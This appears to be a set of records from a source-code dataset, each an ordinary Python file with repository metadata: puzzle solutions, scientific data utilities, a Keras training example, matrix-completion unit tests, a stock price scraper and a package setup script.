| 32.2 | 109 | 0.677019 | 49 | 483 | 6.612245 | 0.612245 | 0.064815 | 0.117284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120083 | 483 | 14 | 110 | 34.5 | 0.762353 | 0.488613 | 0 | 0 | 0 | 0 | 0.362573 | 0.309942 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
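The middleware added above lives in common.test.pacts and is not shown here; the following is a hypothetical Django-style sketch of what such a class would need to do with MOCK_USERNAME, not actual edx-platform code.

from django.contrib.auth import get_user_model

class AuthenticationMiddleware:  # hypothetical sketch, see note above
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        # Attach the mock user so Pact verification calls pass auth checks.
        user, _ = get_user_model().objects.get_or_create(username=MOCK_USERNAME)
        request.user = user
        return self.get_response(request)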
df3ec7382f03ff1dc0f4c5ebdc2543927a15d2f3 | 249 | py | Python | Python/Collections/Collections.OrderedDict()/solution.py | rawat9/HackerRank | 1483eee58c717ebf45fe749de6b1ad899edc13d7 | [
"MIT"
] | null | null | null | Python/Collections/Collections.OrderedDict()/solution.py | rawat9/HackerRank | 1483eee58c717ebf45fe749de6b1ad899edc13d7 | [
"MIT"
] | null | null | null | Python/Collections/Collections.OrderedDict()/solution.py | rawat9/HackerRank | 1483eee58c717ebf45fe749de6b1ad899edc13d7 | [
"MIT"
] | null | null | null | from collections import OrderedDict
n = int(input())
d = OrderedDict()
for _ in range(n):
items = input()
item_name, price = items.rsplit(" ", 1)
d[item_name] = d.get(item_name, 0) + int(price)
for k, v in d.items():
print(k, v)
| 17.785714 | 51 | 0.614458 | 40 | 249 | 3.725 | 0.55 | 0.161074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010363 | 0.2249 | 249 | 13 | 52 | 19.153846 | 0.761658 | 0 | 0 | 0 | 0 | 0 | 0.004016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
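A worked example of the solution above on the standard HackerRank sample: repeated item names accumulate their prices, and OrderedDict preserves first-seen order.

# stdin:                       # stdout:
#   9                          #   BANANA FRIES 12
#   BANANA FRIES 12            #   POTATO CHIPS 60
#   POTATO CHIPS 30            #   APPLE JUICE 20
#   APPLE JUICE 10             #   CANDY 25
#   CANDY 5
#   APPLE JUICE 10
#   CANDY 5
#   CANDY 5
#   CANDY 10
#   POTATO CHIPS 30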
df40520ca3659cc22f496aa644d7242d8e66e927 | 2,104 | py | Python | aoc24.py | juestr/aoc-2021 | 11e31f9dafd234cf4617ff596546cd7a17189f79 | [
"MIT"
] | null | null | null | aoc24.py | juestr/aoc-2021 | 11e31f9dafd234cf4617ff596546cd7a17189f79 | [
"MIT"
] | null | null | null | aoc24.py | juestr/aoc-2021 | 11e31f9dafd234cf4617ff596546cd7a17189f79 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
# This was very hard, but I attempted a blackbox general solution without
# analyzing the code by hand first.
# Trying to solve this with sympy hangs while building and simplifying
# expressions far from the required depth, and I didn't want to mess with
# better solvers.
# I had to look at the solutions thread eventually after noticing the
# regular pattern and running out of time.
with open(sys.argv[1] if len(sys.argv) >= 2 else 'aoc24_input.txt') as f:
input = f.read().splitlines()
code = [tuple(l.split()) for l in input]
params = list(zip(*[[int(l[2]) for l in code[offs::18]] for offs in (4, 5, 15)]))
# print(params)
# The input code repeats this loop 14 times, once per input digit,
# the only difference being the 3 parameters extracted above.
# This is not really needed except for the final asserts.
def monad(inputs):
z = 0
for (a, b, c), d in zip(params, inputs):
inp = int(d)
z, x = divmod(z, a) # a is always either 1 (=noop) or 26 (=pop)
if x != inp - b: # for every a==26 this must be avoided
z = 26 * z + (inp + c) # push inp + c
return z
def find(part):
inputs = []
z = 0
pushes = []
for i in range(14):
a, b, c = params[i]
if a == 1:
z = z * 26 + c
inputs.append(9 if part == 1 else 1) # assume best case
pushes.append(i)
else:
assert a == 26
ptr = pushes.pop()
z, x = divmod(z, 26)
inputs.append(inputs[ptr] + x + b)
if inputs[i] > 9: # adjust down
assert part == 1
inputs[ptr] += 9 - inputs[i]
inputs[i] = 9
elif inputs[i] < 1: # adjust up
assert part == 2
inputs[ptr] += 1 - inputs[i]
inputs[i] = 1
return ''.join(str(d) for d in inputs)
p1 = find(part=1)
assert monad(p1) == 0
print(f'Part 1: {p1=}')
p2 = find(part=2)
assert monad(p2) == 0
print(f'Part 2: {p2=}')
| 32.875 | 81 | 0.548954 | 327 | 2,104 | 3.529052 | 0.461774 | 0.036395 | 0.010399 | 0.015598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039971 | 0.334125 | 2,104 | 63 | 82 | 33.396825 | 0.783726 | 0.343156 | 0 | 0.046512 | 0 | 0 | 0.030059 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 1 | 0.046512 | false | 0 | 0.023256 | 0 | 0.116279 | 0.046512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
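The push/pop trick exploited by find() in isolation: z behaves as a base-26 stack, where multiplying by 26 pushes a value and divmod(z, 26) pops it. A tiny self-contained sketch:

z = 0
z = 26 * z + 5        # push 5
z = 26 * z + 17       # push 17
z, top = divmod(z, 26)
assert top == 17 and z == 5   # popped in LIFO order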
df41555b18281e7b1b5ce196861c57f7bd6e3924 | 6,471 | py | Python | string-method/src/stringprocessor/processing_utils.py | delemottelab/gpcr-string-method-2019 | b50786a4a8747d56ad04ede525592eb31f1890fd | [
"MIT"
] | null | null | null | string-method/src/stringprocessor/processing_utils.py | delemottelab/gpcr-string-method-2019 | b50786a4a8747d56ad04ede525592eb31f1890fd | [
"MIT"
] | null | null | null | string-method/src/stringprocessor/processing_utils.py | delemottelab/gpcr-string-method-2019 | b50786a4a8747d56ad04ede525592eb31f1890fd | [
"MIT"
] | 3 | 2020-03-16T04:33:50.000Z | 2021-03-19T17:25:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import sys
logging.basicConfig(
stream=sys.stdout,
level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
from os.path import abspath, exists
import numpy as np
import mdtraj as md
import matplotlib.pyplot as plt
import utils
import colvars
logger = logging.getLogger("SingleIterationPostProcessor")
def load_swarm(runner, point_idx, swarm_batch_idx, swarm_idx, ignore_missing_files=False,
traj_filetypes=["xtc", "trr"], fallback_on_restrained_output=True):
"""
Load a single swarm trajectory
:param runner:
:param point_idx:
:param swarm_batch_idx:
:param swarm_idx:
:param ignore_missing_files: return None instead of throwing exception when files are not found
:param traj_filetypes: types of trajectory file types to try and load
:param fallback_on_restrained_output: Try to load the restrained last frame and the .gro output for this swarm and create a 2-frame trajectory from this
:return: trajectory or None
"""
# Load swarm trajectory
found_traj = False
for ftype in traj_filetypes:
trajpath = runner.point_path(point_idx) + runner.swarm_name(point_idx, swarm_batch_idx, swarm_idx) + "." + ftype
if exists(trajpath):
found_traj = True
break
if not found_traj:
# if fallback_on_restrained_output:
# return load_restrained_out_swarm(runner, point_idx, swarm_batch_idx, swarm_idx,
# ignore_missing_files=ignore_missing_files)
if ignore_missing_files:
logger.warn("File %s not found. Skipping this swarm", trajpath)
return None
else:
raise IOError("Swarm %s-%s not found for point %s at iteration %s" % (
swarm_batch_idx, swarm_idx, point_idx, runner.iteration))
trajpath = abspath(trajpath)
try:
swarmtraj = md.load(trajpath, top=runner.topology)
except Exception as ex:
logger.exception(ex)
logger.error("Could not load file %s.", trajpath)
if fallback_on_restrained_output:
            # Quite often the trajectory file is truncated or corrupt; fall back to the restrained output.
return load_restrained_out_swarm(runner, point_idx, swarm_batch_idx, swarm_idx,
ignore_missing_files=ignore_missing_files)
raise ex
return swarmtraj
def load_restrained_out_swarm(runner, point_idx, swarm_batch_idx, swarm_idx, ignore_missing_files=False):
"""
Try to load the restrained last frame and the .gro output for this swarm and create a 2-frame trajectory from this
:param runner:
:param point_idx:
:param swarm_batch_idx:
:param swarm_idx:
:param ignore_missing_files: return None if trajectory is not found instead of throwing exception
:return: a 2-frame trajectory
"""
restrained_out = load_restrained(runner, point_idx, only_last_frame=True, ignore_missing_files=ignore_missing_files)
swarm_out = load_swarm(runner, point_idx, swarm_batch_idx, swarm_idx, traj_filetypes=["gro"],
ignore_missing_files=ignore_missing_files, fallback_on_restrained_output=False)
if restrained_out is None or swarm_out is None:
msg = "%s not found from restrained_out. Skipping this swarm" % runner.swarm_name(point_idx, swarm_batch_idx,
swarm_idx)
if ignore_missing_files:
            logger.warning(msg)
return None
else:
raise IOError(msg)
return restrained_out + swarm_out
def load_restrained(runner, point_idx, traj_filetypes=["trr", "xtc", "gro"], ignore_missing_files=False,
only_last_frame=True):
"""
:param runner:
:param point_idx:
:param traj_filetypes: types of trajectory file types to try and load
:param ignore_missing_files: return None if trajectory is not found instead of throwing exception
:param only_last_frame: only return the last frame
:return:
"""
found_traj = False
for ftype in traj_filetypes:
trajpath = runner.point_path(point_idx) + runner.point_name(point_idx) + "-restrained.%s" % ftype
if exists(trajpath):
found_traj = True
break
if not found_traj:
msg = "File %s not found. Skipping this swarm" % trajpath
if ignore_missing_files:
            logger.warning(msg)
return None
else:
raise IOError(msg)
restrained = md.load(trajpath, top=runner.topology)
return restrained[-1] if only_last_frame else restrained
def merge_restrained(runner, traj_filetypes=["trr", "xtc", "gro"]):
"""Merge all restrained simulation endpoints for this iteration"""
traj = None
for idx in range(len(runner.stringpath)):
if runner.fixed_endpoints and (idx == 0 or idx == len(runner.stringpath) - 1):
continue
t = load_restrained(runner, idx, traj_filetypes=traj_filetypes)
if traj is None:
traj = t
else:
traj += t
return traj
def save_string(string_filepath, iteration, stringpath, append_length=False):
if append_length:
suffix = "{}_len{}".format(iteration, len(stringpath))
else:
suffix = str(iteration)
name = string_filepath % suffix
np.savetxt(name, stringpath)
def create_stringpath_files_of_different_lengths(runner, short_stringpath, number_of_points_to_add=1):
"""Modifies the current iteration's output string and adds a point to it. The original string is saved with a suffix"""
long_stringpath = utils.change_string_length(short_stringpath, len(short_stringpath) + number_of_points_to_add)
save_string(runner.string_filepath, runner.iteration, short_stringpath, append_length=True)
save_string(runner.string_filepath, runner.iteration, long_stringpath, append_length=True)
logger.info("Added %s points to string for iteration %s. New string length=%s", number_of_points_to_add,
runner.iteration, len(long_stringpath))
return long_stringpath
def save_input_coordinate_mapping(string_filepath, iteration, input_coordinate_mapping):
filepath = string_filepath % (str(iteration) + "-mapping")
np.savetxt(filepath, input_coordinate_mapping)
| 41.748387 | 156 | 0.684593 | 838 | 6,471 | 5.036993 | 0.186158 | 0.052357 | 0.072495 | 0.034115 | 0.497276 | 0.444681 | 0.400142 | 0.36271 | 0.344705 | 0.344705 | 0 | 0.001421 | 0.238912 | 6,471 | 154 | 157 | 42.019481 | 0.855635 | 0.222686 | 0 | 0.267327 | 0 | 0 | 0.085019 | 0.010423 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.108911 | 0 | 0.267327 | 0.009901 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
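A minimal sketch of save_string above; the %s-style template is an assumption about how string_filepath is formatted elsewhere in the project.

import os
import numpy as np

os.makedirs('out', exist_ok=True)
stringpath = np.linspace(0.0, 1.0, 20).reshape(10, 2)
save_string('out/string%s.txt', iteration=3, stringpath=stringpath,
            append_length=True)   # writes out/string3_len10.txt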
df4222a6ed7b73ffb1dc9e9798f1e7e335b7d1bc | 3,893 | py | Python | examples/reporter/main.py | run-ai/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 86 | 2020-01-23T18:56:41.000Z | 2022-02-14T22:32:08.000Z | examples/reporter/main.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 18 | 2020-01-24T17:55:18.000Z | 2021-12-01T01:01:32.000Z | examples/reporter/main.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 12 | 2020-02-03T14:30:44.000Z | 2022-01-08T16:06:59.000Z | import os
import time
import keras
import numpy as np
import scipy.misc  # scipy.misc.imresize() was removed in scipy-1.3.0
import runai.reporter.keras
BATCH_SIZE = 64
IMAGE_SIZE = 224
def resize_images(src, shape):
resized = [scipy.misc.imresize(img, shape, 'bilinear', 'RGB') for img in src]
return np.stack(resized)
def load_cifar10_data():
path = '/src/examples/reporter/cifar-10'
num_train_samples = 50000
x_train = np.empty((num_train_samples, 3, 32, 32), dtype='uint8')
y_train = np.empty((num_train_samples,), dtype='uint8')
for i in range(1, 6):
fpath = os.path.join(path, 'data_batch_' + str(i))
(x_train[(i - 1) * 10000: i * 10000, :, :, :],
y_train[(i - 1) * 10000: i * 10000]) = keras.datasets.cifar.load_batch(fpath)
fpath = os.path.join(path, 'test_batch')
x_test, y_test = keras.datasets.cifar.load_batch(fpath)
y_train = np.reshape(y_train, (len(y_train), 1))
y_test = np.reshape(y_test, (len(y_test), 1))
if keras.backend.image_data_format() == 'channels_last':
x_train = x_train.transpose(0, 2, 3, 1)
x_test = x_test.transpose(0, 2, 3, 1)
return (x_train, y_train), (x_test, y_test)
def cifar10_data(train_samples, test_samples, num_classes, trg_image_dim_size):
(x_train, y_train), (x_test, y_test) = load_cifar10_data()
print('Loaded train samples')
x_train = x_train[:train_samples]
y_train = y_train[:train_samples]
x_test = x_test[:test_samples]
y_test = y_test[:test_samples]
x_train = resize_images(x_train, (trg_image_dim_size, trg_image_dim_size))
x_test = resize_images(x_test, (trg_image_dim_size, trg_image_dim_size))
y_train = np.clip(y_train, None, num_classes - 1)
y_test = np.clip(y_test, None, num_classes - 1)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
print('Preprocessed train samples')
print('X train shape: %s' % str(x_train.shape))
print('Y train shape: %s' % str(y_train.shape))
print('X test shape: %s' % str(x_test.shape))
print('Y test shape: %s' % str(y_test.shape))
return (x_train, y_train), (x_test, y_test)
class StepTimeReporter(keras.callbacks.Callback):
def on_batch_begin(self, batch, logs={}):
self.batch_start = time.time()
def on_batch_end(self, batch, logs={}):
print(' >> Step %d took %g sec' % (batch, time.time() - self.batch_start))
def on_epoch_begin(self, epoch, logs=None):
self.epoch_start = time.time()
def on_epoch_end(self, epoch, logs=None):
print(' >> Epoch %d took %g sec' % (epoch, time.time() - self.epoch_start))
def main():
with runai.reporter.keras.Reporter(autolog=True) as reporter:
reporter.reportParameter("state", "Loading data")
(x_train, y_train), (x_test, y_test) = cifar10_data(
train_samples=5000,
test_samples=1000,
num_classes=10,
trg_image_dim_size=IMAGE_SIZE,
)
reporter.reportParameter("state", "Building model")
model = keras.applications.vgg19.VGG19(
input_shape=x_train[0].shape,
include_top=True,
weights=None,
input_tensor=None,
pooling=None,
classes=10)
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=1e-3),
metrics=['accuracy'])
reporter.reportParameter("state", "Training model")
model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=10,
validation_data=(x_test, y_test),
shuffle=False,
verbose=1,
callbacks=[StepTimeReporter()])
reporter.reportParameter("state", "Done")
if __name__ == "__main__":
main()
| 33.273504 | 86 | 0.63627 | 554 | 3,893 | 4.203971 | 0.247292 | 0.046372 | 0.02705 | 0.025762 | 0.218978 | 0.134822 | 0.068699 | 0.068699 | 0.024045 | 0 | 0 | 0.029422 | 0.231698 | 3,893 | 116 | 87 | 33.560345 | 0.749248 | 0.0131 | 0 | 0.022989 | 0 | 0 | 0.090885 | 0.014323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091954 | false | 0 | 0.068966 | 0 | 0.206897 | 0.091954 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
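A quick shape check for resize_images above; it requires scipy older than 1.3.0, as noted in the import comment.

import numpy as np

batch = np.random.randint(0, 255, size=(4, 32, 32, 3), dtype='uint8')
resized = resize_images(batch, (IMAGE_SIZE, IMAGE_SIZE))
assert resized.shape == (4, IMAGE_SIZE, IMAGE_SIZE, 3)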
df448b1fe5980f6ff5ca821f44dfced35dad6d97 | 7,134 | py | Python | tests/test_soft_impute.py | cs224/sparseMF | 39fbede77eceb5231db875820da94b68a5227e0d | [
"Apache-2.0"
] | 10 | 2017-10-16T18:50:53.000Z | 2021-11-07T05:34:58.000Z | tests/test_soft_impute.py | cs224/sparseMF | 39fbede77eceb5231db875820da94b68a5227e0d | [
"Apache-2.0"
] | null | null | null | tests/test_soft_impute.py | cs224/sparseMF | 39fbede77eceb5231db875820da94b68a5227e0d | [
"Apache-2.0"
] | 5 | 2018-05-30T06:19:35.000Z | 2021-05-29T20:55:28.000Z | import numpy as np
from sparse_soft_impute import SoftImpute, SPLR
from scipy.sparse import coo_matrix, csr_matrix, csc_matrix, lil_matrix
from sklearn.utils.testing import assert_raises, assert_equal, assert_array_equal
import unittest
class TestPredict(unittest.TestCase):
''' Unit Tests for the Sparse implementation of SoftImpute '''
def setUp(self):
row = np.array([0, 3, 1, 0, 4])
col = np.array([0, 3, 1, 2, 5])
data = np.array([4, -5, 7, -9, 2])
self.x = csr_matrix((data, (row, col)), shape=(5, 6))
self.si = SoftImpute()
self.x_pred = self.si.complete(self.x)
self.splr = SPLR(self.si.prepare_input_data(self.x))
def test_prepare_input_data(self):
'''
Ensure that prepare_input_data method sets the missing mask
and clips max_rank back to an acceptable level, if it is outside
bounds.
'''
self.assertTrue(len(self.si.missing_mask) == 3)
self.assertTrue(self.si.max_rank == 2)
self.si.max_rank = 10
self.si.prepare_input_data(self.x)
self.assertFalse(self.si.max_rank == 10)
def test_fill(self):
'''
For the sparse setting, fill calls _preprocess_sparse(X). This
test ensures the preprocessing step works as expected, and outputs
are of the expected dimensions.
'''
rows, cols, shape = self.si.missing_mask
self.assertTrue(len(rows) == len(cols))
self.assertTrue(len(shape) == 2)
U, D_sq, V = self.si.fill(self.x, inplace=True)
self.assertTrue(U.shape == (shape[0], self.si.max_rank))
self.assertTrue(np.all(D_sq == np.ones(self.si.max_rank)))
self.assertTrue(np.all(V == np.zeros((shape[1],self.si.max_rank))))
def test_UD(self):
U = np.ones((6,3))
D = np.ones(3)
m = 6
expected = np.ones((6,3))
self.assertTrue(np.all(expected == self.si._UD(U, D, m)))
def test_xhat_pred(self):
'''
Ensures that the first value outputted by _xhat_pred is equal to the first output from x_result_svd's recomposed output.
'''
x_result_svd = self.x_pred
x_dense = x_result_svd[0].dot(np.diag(x_result_svd[1]).dot(x_result_svd[2].T))
self.assertAlmostEqual(x_dense[0,0], self.si._xhat_pred()[0], places=5)
def test_als_u_step(self):
'''
Tests that the output shapes are correct.
'''
V_expected_shape = (5,2)
D_sq_expected_length = self.si.max_rank
self.si._als_u_step()
output = self.si.X_fill
self.assertTrue(len(output[1]) == D_sq_expected_length)
self.assertTrue(output[0].shape == V_expected_shape)
def test_als_v_step(self):
'''
Tests that the output shapes are correct.
'''
us, d_sqs, vs = (5,2), 2, (6,2)
self.si._als_v_step()
output = self.si.X_fill
self.assertTrue(output[0].shape == us)
self.assertTrue(len(output[1]) == 2)
self.assertTrue(output[2].shape == vs)
def test_fnorm(self):
'''
Calculated Frobenius Norm by hand, ensured matching results
'''
output = self.si._fnorm(self.si.fill(self.x), self.x_pred)
expected_output = 1
self.assertAlmostEqual(expected_output, output, places=2)
def test_als_cleanup_step(self):
'''
Tests that the output shapes are correct.
'''
Us, D_sqs, Vs = (5,2), 2, (6,2)
self.si._als_cleanup_step()
output = self.si.X_fill
self.assertTrue(output[0].shape == Us)
self.assertTrue(len(output[1]) == 2)
self.assertTrue(output[2].shape == Vs)
def test_als_step(self):
'''
Ensure that X_fill_svd is updating, and that shapes remain correct.
'''
Uo, so, Vo = self.x_pred
U, s, V = self.si.fill(self.x)
self.assertTrue(U.shape == Uo.shape)
self.assertTrue(V.shape == Vo.shape)
self.assertFalse(np.all(s == so))
self.assertFalse(np.all(U == Uo))
self.assertFalse(np.all(V == Vo))
def test_solve(self):
'''
Ensure shape of output is correct.
'''
output = self.si.solve(self.x_pred, self.x)
U, s, V = output
Uo, so, Vo = self.si.fill(self.x)
self.assertTrue(U.shape == Uo.shape)
self.assertTrue(V.shape == Vo.shape)
self.assertFalse(np.all(s == so))
self.assertFalse(np.all(U == Uo))
self.assertFalse(np.all(V == Vo))
def test_predict_one(self):
self.assertEqual(self.si.predict(1,1), 7)
self.assertNotEqual(self.si.predict(0,1), 0)
with self.assertRaises(ValueError):
self.si.predict(5,0)
def test_predict_many(self):
col_ids = np.array([0, 3, 5, 2])
row_ids = np.array([0, 3, 4, 0])
expected = np.array([4, -5, 2, -9])
self.assertTrue(np.all(self.si.predict(row_ids, col_ids) == expected))
#col_ids = np.array([1,2,1,1,4])
#row_ids = np.array([2,1,1,3,4])
#x_result_svd = si.complete(x)
#x_dense = x_result_svd[0].dot(np.diag(x_result_svd[1]).dot(x_result_svd[2].t))
#unknown_in = zip(row_ids, col_ids)
#expected = np.empty(len(unknown_in))
#for idx, (r, c) in enumerate(unknown_in):
# expected[idx] = x_dense[r, c]
#self.asserttrue(np.all(si.predict_many(row_ids, col_ids) == expected))
if __name__ == '__main__':
unittest.main()
'''
# test parameters
sf = SoftImpute(max_rank=3, shrinkage_value=1, init_fill_method='sparse')
# original dataset:
xsc = np.array([[ 0.1390011, -0.09270246, -0.04629866, 0, 0], [-0.4469535, 0, 0.44695354, 0, 0], [-0.8252855, 0, 0, 0.1160078, 0.7092777], [-0.1981945, -0.7993484, 0.16913247, 0.8089969, 0], [ 0.9662344, 0.01088327, -0.56979652, -0.9250004, 0.5176792], [ 0.3651963, 0.86175224, 0, 0, -1.2269486]])
x_orig = csc_matrix(xsc)
# same dataset rounded and in more legible format:
np.array([[ 0.14, -0.09, -0.05, 0. , 0. ],
[-0.45, 0. , 0.45, 0. , 0. ],
[-0.83, 0. , 0. , 0.12, 0.71],
[-0.2 , -0.8 , 0.17, 0.81, 0. ],
[ 0.97, 0.01, -0.57, -0.93, 0.52],
[ 0.37, 0.86, 0. , 0. , -1.23]])
# results from Trevor Hastie's implementation (roughly; these were actually my results from my version)
np.array([[ 0.03, 0. , -0.02, -0.03, 0.02],
[-0.18, -0.09, 0.1 , 0.17, 0.02],
[-0.26, -0.28, 0.09, 0.18, 0.3 ],
[-0.31, -0.24, 0.13, 0.25, 0.19],
[ 0.42, 0.08, -0.26, -0.42, 0.16],
[ 0.25, 0.42, -0.03, -0.12, -0.55]]) '''
| 40.765714 | 305 | 0.543454 | 1,034 | 7,134 | 3.610251 | 0.22824 | 0.049826 | 0.024109 | 0.024377 | 0.321993 | 0.260113 | 0.250469 | 0.236003 | 0.209483 | 0.198232 | 0 | 0.087036 | 0.309083 | 7,134 | 174 | 306 | 41 | 0.670319 | 0.160499 | 0 | 0.163043 | 0 | 0 | 0.001906 | 0 | 0 | 0 | 0 | 0 | 0.369565 | 1 | 0.141304 | false | 0 | 0.054348 | 0 | 0.206522 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
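A minimal end-to-end sketch mirroring the fixture above, assuming the sparse_soft_impute package is importable:

import numpy as np
from scipy.sparse import csr_matrix
from sparse_soft_impute import SoftImpute

row = np.array([0, 3, 1, 0, 4])
col = np.array([0, 3, 1, 2, 5])
data = np.array([4, -5, 7, -9, 2])
x = csr_matrix((data, (row, col)), shape=(5, 6))
si = SoftImpute()
si.complete(x)            # fit the low-rank factorization
print(si.predict(1, 1))   # observed entry: prints 7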
df44da4ef35197d7d9945d76216ec30f27d1d9a7 | 501 | py | Python | web_programming/current_stock_price.py | JB1959/Python | b6ca263983933c3ecc06ed0083dd11b6faf870c8 | [
"MIT"
] | 145,614 | 2016-07-21T05:40:05.000Z | 2022-03-31T22:17:22.000Z | web_programming/current_stock_price.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 3,987 | 2016-07-28T17:31:25.000Z | 2022-03-30T23:07:46.000Z | web_programming/current_stock_price.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 40,014 | 2016-07-26T15:14:41.000Z | 2022-03-31T22:23:03.000Z | import requests
from bs4 import BeautifulSoup
def stock_price(symbol: str = "AAPL") -> str:
url = f"https://in.finance.yahoo.com/quote/{symbol}?s={symbol}"
soup = BeautifulSoup(requests.get(url).text, "html.parser")
class_ = "My(6px) Pos(r) smartphone_Mt(6px)"
return soup.find("div", class_=class_).find("span").text
if __name__ == "__main__":
for symbol in "AAPL AMZN IBM GOOG MSFT ORCL".split():
print(f"Current {symbol:<4} stock price is {stock_price(symbol):>8}")
| 33.4 | 77 | 0.674651 | 74 | 501 | 4.378378 | 0.689189 | 0.092593 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011848 | 0.157685 | 501 | 14 | 78 | 35.785714 | 0.755924 | 0 | 0 | 0 | 0 | 0 | 0.407186 | 0.047904 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
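The hard-coded Yahoo CSS class above breaks whenever the page markup changes; a hedged wrapper, not part of the original module, that fails soft instead of raising:

def safe_stock_price(symbol: str) -> str:
    try:
        return stock_price(symbol)
    except AttributeError:   # soup.find(...) returned None: markup changed
        return "unavailable"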
df44f6107463c12a6376b5f9f8eb4b96683a6ba1 | 2,006 | py | Python | setup.py | jacobic/spiders | 287dcf041ba248dd369646236cdbf07ecf32d4e8 | [
"MIT"
] | null | null | null | setup.py | jacobic/spiders | 287dcf041ba248dd369646236cdbf07ecf32d4e8 | [
"MIT"
] | null | null | null | setup.py | jacobic/spiders | 287dcf041ba248dd369646236cdbf07ecf32d4e8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = ['Click>=6.0', 'colossus', 'astropy', 'pandas', 'scikit-learn',
'numpy', 'scipy', 'dill', 'emcee', 'tqdm', 'multiprocess',
'dask', 'pyspark', 'pymangle'
]
dependency_links = [
# Make sure to include the `#egg` portion so the `install_requires`
# recognizes the package
# Dask friendly version of emcee.
'git+ssh://git@github.com/jacobic/emcee.git#egg=emcee-emcee-2.2.1'
#
]
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest', ]
setup(author="Jacob Ider Chitham", author_email='jacobic@mpe.mpg.de',
classifiers=['Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License', 'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7', ],
description="Python Boilerplate contains all the boilerplate you need to "
"create a Python package.",
entry_points={
'console_scripts': ['spiders=spiders.cli:main', ], },
install_requires=requirements, license="MIT license",
long_description=readme + '\n\n' + history, include_package_data=True,
keywords='spiders', name='spiders',
packages=find_packages(include=['spiders', 'spiders.*']),
setup_requires=setup_requirements, test_suite='tests',
tests_require=test_requirements, url='https://github.com/jacobic/spiders',
version='0.1.0', zip_safe=False, )
